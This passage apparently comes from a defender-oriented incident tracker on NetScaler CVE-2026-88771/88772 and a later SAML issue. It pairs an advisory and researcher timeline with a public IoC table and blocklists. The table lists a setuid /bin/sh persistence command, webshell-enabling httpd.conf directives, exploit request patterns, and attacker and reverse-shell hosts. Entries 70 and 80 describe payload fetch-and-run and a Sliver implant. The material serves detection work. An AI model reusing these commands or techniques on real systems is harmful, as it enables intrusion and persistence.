    Help Net Security relays Carmakal saying advanced and suspected state-sponsored threat actors are likely behind the initial targeted intrusions that used CVE-2026-88772, with dozens of organisations impacted across North America and Europe. No actor is named.

    Sources: [84]

  63. Official advisory Deadline - upcoming

    Deadline: CISA KEV federal remediation

    Both CVEs were added to KEV on 27 Sep with a due date of 30 Sep, giving US federal agencies three days. The required action is to apply Citrix mitigations under BOD 26-04 and CISA's Forensics Triage Requirements, or stop using the product if mitigations are unavailable; the KEV notes say customers must conduct forensic triage. The KEV entry gives a date only (2026-09-30), no time of day. CISA's directive deadlines are conventionally 11:59 PM U.S. Eastern (23:59 EDT, 03:59 UTC on 1 Oct), and third-party KEV trackers treat the due date the same way, but CISA publishes no official time for KEV due dates - so the deadline was passed by 1 Oct 04:00 UTC at the latest. A deadline, not an event.

    Sources: [20][7][86][88]

  64. Reported observation

    Beaumont: Arctic Wolf set is new "spray and pray" activity

    He says the follow-up activity covered by the Arctic Wolf IoCs is definitely not related to the initial actor in early September.

    Sources: [73]

  65. Research

    Poppelgaard checker v1.9 adds public indicators

    Release 1.9 of the free, read-only CTX697096 checker script adds, among others, Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs, and tags each attack line as before or after the fix. Its author says a clean result is not proof of a clean appliance.

    Sources: [39]

  66. Official advisory

    NCSC-FI (Finland): confirmed intrusions in Finland before the patches

    The National Cyber Security Centre Finland (NCSC-FI, part of Traficom) publishes an alert after receiving reports of active exploitation of the CTX697096 vulnerabilities in Finland, including intrusions that began before Citrix released the security updates on 27 September. The underlying Finnish warning page (Warning 1/2026) classifies it as a yellow warning ("Keltainen varoitus"). NCSC-FI says internet-facing NetScaler systems should be assumed to have been exposed to attacks, that updating alone may not be enough because an attacker may have established a persistent foothold, and that organisations must investigate for compromise even if they patched quickly: review logs and administrative changes, check user accounts created on the systems, scheduled tasks, services and other persistence, and change administrative passwords if compromise is suspected. NCSC-FI says it has identified hundreds of NetScaler instances in Finland and contacted their administrators, and asks organisations to report observed exploitation and intrusions.

    Sources: [19]

  67. Official advisory

    BSI (Germany) updates its warning and recommends this site's IoC list

    BSI's TLP:CLEAR warning BITS-H 2026-289305-1132 (version 1.1, 1 Oct) rates the criticality 3 / Orange, meaning act immediately. It says logs should be checked back to at least early September, that patching alone does not remove a compromise, and that operators should check for a compromise even if they patched on release day. In its update it links to PitScaler as a place that collects detection options and IoCs from several sources, and recommends that operators use the growing IoC list.

    Sources: [18]

  68. Official advisory Validated

    Citrix ships version 4 of its IoC detection logic

    Citrix has released a fourth version of the IoC detection logic used by the NetScaler Console scan. Citrix's documentation says the logic keeps being updated and that Console shows when an update is available, so rerun the scan after updating.

    Version 4 validated independently on 1 Oct.

    Sources: [6]

  69. Research

    Analysis: "NetScaler Needs More Than Another Patch" - the case against treating each emergency as the fix

    A long-form analysis by "Martin" (mac.sploit.dk, 08:00 CEST, opinion; the site's about page says only that the author has "spent a long time working in cybersecurity") argues that the recurring emergency-patch cycle is the wrong frame. Its claims, each with stated boundaries: NetScaler 14.1 runs a vendor-modified FreeBSD 11.4 base (upstream EOL since September 2021); of 107 examined executables under /netscaler, 106 lack PIE and only one has RELRO (from the author's earlier lab assessment of build 73.30, not evidence of an internet-reachable path); most packet and control-plane services observed ran as root with no visible privilege drop, and the author reports a locally demonstrated authentication failure in the privileged configuration service. It reads Citrix's 1 October NetScaler 15.1-9.30 Tech Preview (FreeBSD to Linux, BLX/DPDK data plane, ASLR, SELinux auditing, Yama, faster third-party patching) as promising platform work that does not fix NetScaler's own application-layer bugs, and notes it is a days-old vendor-described preview, not independently tested. Also notes CVE-2026-88771 was a root Perl script passing failed-login text to a shell via backticks - command construction, not memory corruption - so memory-safety roadmaps alone would not have stopped it. Renewal-meeting checklist included (SBOM, privilege separation evidence, mitigation settings, session-kill guidance, ZTNA off-ramp). All vendor bulletins it cites are already on this page.

    Sources: [32]

  70. Reported observation Validated

    Beaumont: patched honeypots crash, "we may have PitScaler 2"

    Beaumont says his patched 13.1 and 14.1 honeypots are crashing, from multiple source IPs, and posts greps for authentication-daemon (nsaaad) crashes and pitboss restart messages in ns.log, one of them for 213.209.159.55. The two screenshots in the post show a write-up (author not named) about two 14.1-73.37 appliances that rebooted repeatedly after nsaaad crashed with exit status 0x8a and hit the restart limit of six. On one of them, crafted usernames on SAML factors told the appliance to fetch a payload from 213.209.159.55 over plain HTTP on port 443, save it as /v and run it, just before each crash. The write-up says this shows exploitation attempts and correlated crashes, not confirmed command execution, a CVE or a firmware regression, and adds *.pyrlink.cc as a later delivery source. This is unverified: at the time there was no CVE and no vendor or CERT statement.

    Post text and both screenshots read directly on 2 Oct.

    Sources: [74]

  71. Reported observation Validated

    Beaumont: the pitboss fix "looks bypassable" (to be confirmed)

    In a reply to his honeypot post, Beaumont says that, to be confirmed, it looks like the pitboss fix is bypassable. He gives no technical detail, and Citrix has not said whether builds with the CTX697096 fixes are affected by the new SAML issue.

    Post text read directly on 2 Oct.

    Sources: [76]

  72. Reported observation Validated

    Beaumont: a patched honeypot is running a downloaded binary

    Beaumont says one of his honeypots is running a downloaded (malware) binary, that both were patched so he concludes it is a new vulnerability, and that it is being sprayed and prayed. One honeypot has no valid TLS certificate because he let it expire. He does not say whether the honeypots had SAML configured, and Citrix lists no affected versions yet. These are one researcher's observations and conclusions.

    Post text read directly on 2 Oct.

    Sources: [77]

  73. Reported observation

    Beaumont: the responder policy he says Citrix shared as a SAML workaround does not work for him

    Asked by O_P whether he tried the responder policy from Citrix Support on his crashing honeypot - and whether enhanced ISN was on and he saw the reboots others report - Beaumont replies that "the policy citrix gave out doesn't work for me". This implies Citrix Support is sharing a responder policy as a workaround for the new SAML issue, and that it has not worked on at least one appliance. Single source; the policy text has not been seen, Citrix's own post does not mention any policy, and he does not answer the enhanced-ISN or reboot questions in the reply.

    Sources: [78]

  74. Official advisory

    Citrix publishes guidance on a new SAML issue, independent of CTX697096

    Citrix says it is tracking a newly observed issue related to SAML authentication in customer-managed NetScaler deployments. The issue is associated with deployments that use SAML authentication in conjunction with Gateway or AAA functionality, and is configuration dependent based on the information currently available. The NetScaler is affected when at least one of the following SAML commands is present in the configuration: add authentication samlAction.* or add authentication samlIdPProfile.*. Recommended action: inspect the Gateway and AAA configuration for a SAML authentication action, contact Citrix support if currently experiencing impact, and upgrade to the updated software as soon as possible once the security bulletin is published. Citrix says the issue is independent of the vulnerabilities disclosed in CTX697096, that a new security bulletin and simultaneous product update release is planned, and that it will update the blog as more information becomes available. The post lists no CVE, affected versions, fixed builds or workaround yet, and points to the upcoming bulletin for the definitive list of affected versions, fixed builds and applicability conditions. Last updated 2 October (Pacific Daylight Time). Beaumont links the post at 20:00 UTC; his post was edited at 20:15 UTC, softening "pitboss will execute commands again" to "something will execute commands again" (per the edit history of the post).

    Sources: [2][75]

  75. Reported observation

    Beaumont: "The Citrix support mitigations don't appear to work"; admins firewall-blocking attacker IPs

    Beaumont posts that the Citrix support mitigations do not appear to work, that admins are firewall-blocking known threat-actor IPs as a mitigation instead, and that many people cannot reach Citrix Support ("they've replaced people with AI chat bots"). His screenshot is an r/Citrix thread ("vulnerability scans causing netscaler reboots") where anonymous commenters report NetScaler restarts, one saying the responder-policy fix they received "didnt change anything", another that blackholing the attack IPs "semi works till they change their ip", and a third describing an endless Citrix support chatbot loop. Anonymous Reddit comments relayed via one researcher: unverified, no policy text, and no new IoCs. The thread matches the crash and reboot pattern in the earlier 14.1-73.37 screenshots.

    Sources: [79][106]

  76. Reported observation

    heise: mass spontaneous reboots on fully patched devices; exploit "apparently circulating" since the evening of 2 October

    heise online (Dr. Christopher Kunz, 10:23 CEST) reports that security researchers and administrators are seeing mass spontaneous reboots of devices that were on the latest patch level, that an exploit for the new issue has apparently been circulating since the evening hours of 2 October, and that it can likely be triggered by sending SAML requests in bulk to a vulnerable device. It relays Beaumont's honeypot findings (a downloaded malware binary running on patched devices, so "new vulnerability") and frames the new issue as a possible bypass of the September fix - his framing, not Citrix's. It quotes the claim that "the watchTowr Labs team has now successfully reproduced the vulnerability" without naming its source; watchTowr's own X post the same day confirms the reproduction in its own words (see the next entry). heise notes Citrix's blog names no effective countermeasures and no patch exists yet, and links the same r/Citrix reboot thread. Says it will update the article continuously.

    Sources: [103][77][79][2][106]

  77. Reported observation Approximate date

    Cybersecurity News rounds up the 14.1-73.37 reboot reports: crafted SAML traffic crashing nsaaad, pitboss restarting appliances

    Cybersecurity News (Guru Baran, article dated 3 October; the page shows only the date - earliest observed trace is a Bluesky share at 03:06 UTC, so the publication time is approximate) reports that customers are seeing repeated appliance reboots after installing build 14.1-73.37, linking them to crafted SAML authentication traffic that crashes the nsaaad authentication service until the pitboss watchdog restarts the appliance. It relays anonymous Reddit reports of severity-one cases with Citrix and of Citrix support "reportedly" preparing a fix, and states itself that these reports "do not yet prove attackers have bypassed the September patch" - a crash of nsaaad may be denial of service only, without sender control of the device. Secondary source: the underlying claims are anonymous forum posts it does not link individually, no new technical detail beyond the earlier r/Citrix thread, no Citrix statement, and no new IoCs. Its advice (preserve core files and logs before another restart, correlate reboot times with inbound SAML requests, check nsaaad crash messages in /var/core) matches the checks already on this page.

    Sources: [80][106]

  78. Research

    watchTowr confirms it has reproduced the new vulnerability; mitigation rulesets for platform clients only

    watchTowr posts on X: "Unfortunately? Fortunately? the watchTowr Labs team has now successfully reproduced this vulnerability. watchTowr Platform clients now have mitigation rulesets available to them via our Active Defense capability. Speak soon." The post does not name the vulnerability; in context it is understood to be the SAML issue that heise quoted the same day, and that reading is this site's inference, not watchTowr's statement. What the post itself establishes, in watchTowr's own words: it has reproduced a vulnerability and has mitigation rulesets for Platform clients via Active Defense. Nothing indicates a public ruleset, advisory or IoCs yet. This site lists no watchTowr SAML indicators, and none are implied by this post.

    Sources: [50][103]

  79. Official advisory

    Citrix releases a new responder policy via Support (3 October); not yet in Citrix's public post

    Citrix has released a new responder policy as a mitigation for the SAML issue, distributed through Citrix Support on 3 October. The Poppelgaard checker README describes it and recognises it by behaviour on the appliance: any responder policy whose rule mentions samlauth or doAuthentication, bound to a Gateway/AAA vserver or globally, alongside Citrix's earlier RSP_POL_DROP and community Gotham policies. Citrix's public SAML post does not mention the policy yet and its text has not been published; distribution is through Support (under NDA), which matches Beaumont's reports of a responder policy shared through Support ("the policy citrix gave out doesn't work for me" on Oct 2, "the Citrix support mitigations don't appear to work" on Oct 3). The checker reminds admins to ask Citrix Support for the new policy and verifies whether it is bound - and flags a [CHECK] state where a policy is bound but the Responder feature is disabled, which silently ignores it.

    Sources: [39][2][78][79]

  80. Research

    FreeBSD Sliver C2 implant tied to pylrk.cc delivery: independent malware analysis (TLP:CLEAR), corroborated by Expel IR

    A TLP:CLEAR malware analysis report dated 2 October ties the two 2 October threads together: the payload served at f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host is a Sliver C2 implant cross-compiled for FreeBSD - the operating system under NetScaler - built specifically for these appliances. Statically linked stripped Go ELF64, 8,822,784 bytes. Static strings (sample not executed): hardcoded C2 https://www.pylrk.cc, protocol tag pylrkfbsd, IMPLANT_CAPABILITY_TUNNEL_TERMINAL_V1 with tunnel/reverse-shell capability (consistent with the netcat-style callbacks Expel described in this campaign), a spoofed Chrome 108/Windows User-Agent for its own beacons, and no embedded IP - C2 resolves via DNS to pylrk.cc. VirusTotal: 31 of 75 engines, all Sliver/Vilers labels; first submitted 2 Oct 11:49 UTC; recorded filenames /var/tmp/.host, /private/var/tmp/.host and citrix3.bad (appliance paths). Corroboration: an Expel IR observation of exploitation against a NetScaler Gateway in late Sep-early Oct. This connects the pylrk.cc delivery domain to actual malware, and distinguishes this FreeBSD implant from the Perl webshell hosted on 213.209.159.55 (a separate, weaker-signal payload). The report is vendor-independent: no vendor or CERT has published on it. IoCs are on this page's IoC list.

    Sources: [41][59][40]

  81. Official advisory

    ACSC update: the new SAML issue affects Australian organisations; "crashes, denial of service and potential exploitation"

    ASD's Australian Cyber Security Centre adds an "Update 3 October 2026" section to its alert: Citrix has published guidance about a newly identified issue affecting NetScaler deployments that use SAML authentication; a remote attacker exploiting the issue may induce system crashes, denial of service and potential exploitation; and ASD's ACSC is aware of impacts to Australian organisations. It advises organisations using NetScaler SAML authentication to review their configurations, monitor for unusual activity, follow Citrix's advice, contact Citrix support if impacted, and report to ACSC. It states the issue is understood to be separate from CVE-2026-88771 and CVE-2026-88772. This is the first government confirmation of impact from the new SAML issue, and it stops short of the September-patch-bypass claim: awareness of impacts is not the same as a confirmed bypass of 14.1-73.37. Alert first published 28 Sep, page last updated 3 Oct.

    Sources: [17][2]

Public IoCs Public / TLP:CLEAR only

This table only contains indicators that have been published openly. The Sharing column shows each source's own marking. [53][57][33][34]

Indicators are not proof of compromise by themselves. Validate any hit against appliance logs, filesystem integrity, process history and configuration changes, following your incident-response procedure.

How to read these. Each indicator was observed by the source named in its row. None of them is a universal indicator for every victim. Beaumont reports that webshell names and attacker IPs are unique per victim. [66][70] An empty search result proves nothing.

Download all IoCs as CSV Firewall blocklist (93 IPs, annotated) Plain IP list Domain blocklist (pylrk.cc wildcard, annotated) Plain domain list

The blocklist contains only the IPv4 indicators whose own source data does not warn against blocking. It excludes Cloudflare WARP egress, shared commercial VPN exits, residential/ISP (CGNAT) addresses and a domain-parking IP — those are in the CSV with their caveats. IPs differ per victim; a blocklist is defence in depth, not a substitute for patching and compromise checks.

Publicly released indicators for NetScaler CVE-2026-88771 and CVE-2026-88772 exploitation
TypeExact valueSourceContextCaveatSharing
IPv4149.104.78.141GreyNoise blog [53]; GreyNoise Visualizer [55]; eSentire TRU [48]Exploitation source, Sep 24 (3 sessions 07:32:19-07:32:20 UTC). GreyNoise Visualizer on Sep 29: AS154177 LIGHT NODE LIMITED, Japan; not observed mass scanning in the past day.Observed in GreyNoise sensor data; not a universal indicator for every victim. Beaumont reports attacker IPs vary per victim. eSentire also lists it as an exploitation source.TLP:CLEAR
File path/var/netscaler/logon/LogonPoint/custom/.ctxs.receiverGreyNoise blog [53]; Unit 42 (Palo Alto Networks) [96]; Sygnia [37]Webshell path on diskObserved in GreyNoise sensor data; not a universal indicator for every victim. Beaumont reports webshell names are unique per victim.TLP:CLEAR
URL aliasreceiver.min.cssGreyNoise blog [53]Webshell aliasObserved in GreyNoise sensor data; not a universal indicator for every victim.TLP:CLEAR
AliasMatch regexreceiver\.min\.[0-9a-f]+\.cssGreyNoise blog [53]; CERT-EU [27]Apache config (httpd.conf) AliasMatchObserved in GreyNoise sensor data; not a universal indicator for every victim. Pattern as published; also check httpd.conf integrity generally.TLP:CLEAR
SHA-2566f5a2a452a7901323abd21879c6cecccb47c06aeeaccb1b467212f3b11e4b1e7GreyNoise blog [53]Webshell hashObserved in GreyNoise sensor data; not a universal indicator for every victim. Per-victim webshells may differ.TLP:CLEAR
GreyNoise tagCitrix NetScaler CVE-2026-88771 Login Command Injection RCE AttemptGreyNoise tag [56]; GreyNoise blog [53]Sensor detection tag, created Sep 27. GreyNoise Visualizer on Sep 29: 76 unique IPs tagged between Sep 19 and Sep 29, all classified malicious. All are listed in this table; two are Cloudflare WARP exits, marked as such.Classifies traffic seen by GreyNoise and community sensors only. Most tagged IPs also carry crawler and CitrixBleed 2 tags, so many look like opportunistic scanning.TLP:CLEAR
SHA-256ed082f744f035035900f67edf438f2f7d0528ac501234f63d476d65273cdb9a1IFIN [57].ctxs.receiver webshell sample (237-byte PHP file) posted by a Reddit user, relayed by IFINUnconfirmed single-victim sample. The hardcoded token likely differs per victim, so the hash will too - match on file content, not hash.Public, no restriction
IPv4104.248.244.66Truesec [33]; IFIN [57]; Unit 42 (Palo Alto Networks) [96]Potential C2 IP observed by TruesecIR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host.Public page, no TLP marking
IPv4139.180.152.138Truesec [33]; IFIN [57]; eSentire TRU [48]; Unit 42 (Palo Alto Networks) [96]Potential C2 IP observed by Truesec; webshell delivery per eSentireIR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host.Public page, no TLP marking
IPv477.83.199.39Truesec [33]; IFIN [57]; eSentire TRU [48]; Unit 42 (Palo Alto Networks) [96]; Sygnia [37]Potential C2 IP observed by Truesec; webshell delivery per eSentireIR-vendor observation. Beaumont reports attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host.Public page, no TLP marking
IPv478.135.96.136IFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated.Public, no restriction
IPv4149.28.29.221IFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated.Public, no restriction
IPv480.240.22.229IFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated.Public, no restriction
IPv489.36.231.206IFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated.Public, no restriction
IPv491.195.240.123IFIN [57]Associated exploit source (IFIN compiled observables)Compiled by IFIN from shared reports; the original reporter of each value is not stated. WHOIS: SEDO-NET, Sedo Domain Parking - a shared parking IP used by many unrelated parked domains. Expect heavy false positives; do not block on it alone.Public, no restriction
IPv4143.198.7.94Google GTIG / Mandiant [34]Scanning and staging infrastructurePublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
IPv4157.254.167.12Google GTIG / Mandiant [34]NetScaler exploitation and installation of a basic webshell backdoorPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
HTTP headerHTTP_NSC_LDAPGoogle GTIG / Mandiant [34]Inbound command execution header used by nsginstaller.debPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
HTTP headerHTTP_NSC_CLIENTTYPEGoogle GTIG / Mandiant [34]Inbound command execution header used by nsgclient.sigPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
HTTP headerHTTP_X_UX / HTTP_X_UX_[0-9]+Google GTIG / Mandiant [34]Chunked base64 transport headers used by WHIPSHOTPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
URI path/vpn/media/nsgclient.ico / /vpn/media/*.icoGoogle GTIG / Mandiant [34]Masquerading icon request routed to a .sig webshell via AliasMatchPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsginstaller*.debGoogle GTIG / Mandiant [34]Staging path for malicious PHP webshellsPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
URI path/vpn/scripts/linux/nsgclient*.debGoogle GTIG / Mandiant [34]Staging path for malicious PHP webshellsPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
URI path/vpn/scripts/linux/*.phpGoogle GTIG / Mandiant [34]Staging path for malicious PHP webshellsPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
File path/tmp/.uxdportGoogle GTIG / Mandiant [34]SLAPSHOT active port artefactPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
File path/tmp/.uxdlockGoogle GTIG / Mandiant [34]SLAPSHOT process lock artefactPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
Config directiveAddHandler application/x-httpd-php .debGoogle GTIG / Mandiant [34]httpd.conf change making .deb files run as PHP (GTIG persistence method A)Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Any AddHandler/AddType mapping a non-PHP extension to PHP indicates compromise, per GTIG.Public blog, no TLP marking
Config directiveAddHandler application/x-httpd-php .sigGoogle GTIG / Mandiant [34]httpd.conf change making .sig files run as PHP (GTIG persistence method B)Published by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
Config directiveAliasMatch ^/vpn/media/(.+).ico$ /var/netscaler/gui/vpn/scripts/linux/$1.sigGoogle GTIG / Mandiant [34]Routes /vpn/media/*.ico requests to a .sig webshell with the same base namePublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
File path/netscaler/ns_gui/vpn/scripts/linux/Google GTIG / Mandiant [34]Directory where WHIPSHOT was placedPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Legitimate client binaries live here too; look for ASCII text or PHP markers.Public blog, no TLP marking
Filename patternnginstaller*Google GTIG / Mandiant [34]Installer webshell names seen across intrusions, often followed by a numberPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. GTIG says filenames varied between victims.Public blog, no TLP marking
Filenamensgclient.sigGoogle GTIG / Mandiant [34].sig webshell in VPN script directoriesPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
Filenamee6ee7c85.sigGoogle GTIG / Mandiant [34]GTIG example .sig webshell: reads base64 payloads from HTTP_NSC_CLIENTTYPE, runs them via eval() and returns a fake 404. Reached as /vpn/media/e6ee7c85.ico through the AliasMatch abovePublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Example from one intrusion; GTIG says filenames varied between victims, so absence proves nothing.Public blog, no TLP marking
Log stringpitboss NOT restarting NSPPEGoogle GTIG / Mandiant [34]Watchdog message in /var/log/messages after an NSPPE crashPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only. Strongest when it follows a DTLSv1.0 SSL_HANDSHAKE_FAILURE on the same appliance.Public blog, no TLP marking
StringUXD_IDLE_EXITGoogle GTIG / Mandiant [34]SLAPSHOT idle-exit variablePublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
Commandchmod u+s /bin/shGoogle GTIG / Mandiant [34]; GreyNoise blog [53]Sets setuid on /bin/sh for persistent root; ls -l /bin/sh showing -rwsr-xr-x owned by root means modifiedPublished by GTIG/Mandiant as a hunting lead. GTIG keeps its full IoC collection for registered GTI users only.Public blog, no TLP marking
IPv4138.199.200.90Help Net Security (Sep 29) [98]Destination for data exfiltrated via log poisoning (Hetzner), seen by LupovisLupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC.Public article, no TLP marking
IPv4138.28.234.38Lupovis (@LupovisDefence) on X, Sep 28 [62]; Beazley Security advisory (updated Sep 29) [43]Exploitation with attempted DNS exfiltration (Lupovis)Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC.Public article, no TLP marking
IPv482.167.14.7Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56]; eSentire TRU [48]Exploitation check that writes a test marker (Lupovis); exploitation source per eSentire; also tagged by GreyNoiseLupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. May be a researcher-style check.Public article, no TLP marking
IPv485.203.46.191Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56]Reconnaissance (Lupovis)Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. WHOIS netname Express-Equinix-London; GreyNoise tags it as VPN, so likely a commercial VPN exit shared by many users.Public article, no TLP marking
IPv4154.217.251.226Beazley Security advisory (updated Sep 29) [43]; GreyNoise tag [56]CVE-2026-88772 scanning (Lupovis); also tagged by GreyNoiseLupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC.Public article, no TLP marking
IPv4194.26.29.88Corelight [44]Host of the reverse shell documented by Corelight (WHOIS: Media Land LLC, RU)Reverse-shell infrastructure; hunt for connections from NetScaler NSIP/SNIP addresses.Public blog, no TLP marking
DNS pattern*.instances.httpworkbench.comHelp Net Security (Sep 29) [98]; Beazley Security advisory (updated Sep 29) [43]Outbound lookups from a NetScaler suggest an out-of-band callback (Lupovis hunt advice)httpworkbench.com is a public HTTP/DNS testing service, also used by researchers. Hunt signal only when the lookup comes from a NetScaler; do not block the apex.Public article, no TLP marking
HTTP request patternPOST /nf/auth/doAuthentication.do with body containing "pitboss PPE unexpectedly died NSPPE"Help Net Security (Sep 29) [98]Log-poisoning exploitation attempt (Lupovis hunt advice)Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC.Public article, no TLP marking
URI path/nf/auth/doAuthentication.doDefused (@DefusedCyber) on X, Sep 29 [61]; Help Net Security (Sep 29) [98]CVE-2026-88771 exploitation attempts seen on Defused decoys (any logged field works)Hunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload.Public post, no TLP marking
URI path/cgi/loginDefused (@DefusedCyber) on X, Sep 29 [61]CVE-2026-88771 exploitation attempts seen on Defused decoysHunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload.Public post, no TLP marking
URI path/p/u/doLogon.doDefused (@DefusedCyber) on X, Sep 29 [61]CVE-2026-88771 exploitation attempts seen on Defused decoysHunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload.Public post, no TLP marking
URI path/logon/LogonPoint/tmindex.htmlDefused (@DefusedCyber) on X, Sep 29 [61]CVE-2026-88771 exploitation attempts seen on Defused decoysHunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload.Public post, no TLP marking
HTTP headerUser-Agent (payload in the header on requests to /)Defused (@DefusedCyber) on X, Sep 29 [61]; CERT-EU [27]CVE-2026-88771 exploitation attempts seen on Defused decoysHunting lead from Defused decoys, not an IoC. These are legitimate NetScaler endpoints; flag requests only when a logged field carries shell metacharacters or a payload. CERT-EU separately flags base64 User-Agent strings starting with INDEX:.Public post, no TLP marking
Filenamenx_verify.htmlDefused (@DefusedCyber) on X, Sep 29 [61]Marker file dropped to tag vulnerable boxes for a target list (Defused)Also written by testers; means the box was reached and is exploitable, not necessarily that an actor installed a backdoor.Public post, no TLP marking
SHA-2565ea5ea61e9062822bee3f66ef5ff47c217178d9e31936ad6daf10c5dfae44d12eSentire TRU [48]; Sygnia [37]PHP webshell, .ico variant (publicly on VirusTotal per eSentire); Sygnia also found it during an active IR investigationeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
SHA-2567add390ceee4a1373211b3e340451b34f08965fc4d805f94c9b8cebdc0775774eSentire TRU [48]PHP webshell, .deb variant (not in public repositories per eSentire)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
File path/var/netscaler/gui/vpn/scripts/linux/*.sigeSentire TRU [48]; Google GTIG / Mandiant [34].ico-variant webshell location (eSentire); also matches GTIG method BeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
HTTP request patternGET /vpn/media/*.ico with base64 PHP (starting "PD9") appended to the User-AgenteSentire TRU [48]; CERT-EU [27]Payload staging via the access log (eSentire; matches CERT-EU technique)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
IPv434.90.151.231eSentire TRU [48]Reconnaissance and webshell delivery (eSentire)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. Google Cloud address space; may be reassigned.Public advisory, no TLP marking
IPv431.56.197.72eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Payload host (eSentire); Arctic Wolf: served /lula on ports 80 and 9090, and /kkeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public advisory, no TLP marking
IPv464.94.85.67eSentire TRU [48]; GreyNoise tag [56]; Arctic Wolf [36]; Sygnia [37]; LevelBlue SpiderLabs (THOR team) [42]Payload host (eSentire); also tagged by GreyNoiseeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public advisory, no TLP marking
IPv423.27.143.20eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Payload host (eSentire); Arctic Wolf: served main.py on port 9000, saved as /var/1.py and run with pythoneSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public advisory, no TLP marking
IPv462.133.62.80eSentire TRU [48]; Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42]Payload host (eSentire)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. LevelBlue also lists it from its own THOR hunt, not independently confirmed.Public advisory, no TLP marking
IPv4144.172.108.78eSentire TRU [48]Exploitation source (eSentire)eSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim.Public advisory, no TLP marking
IPv4185.156.46.162eSentire TRU [48]; GreyNoise tag [56]Exploitation source (eSentire); also tagged by GreyNoiseeSentire TRU incident-response observation. Payload hosts and exploitation sources change; not a universal indicator for every victim. GreyNoise tags it as VPN; may be shared.Public advisory, no TLP marking
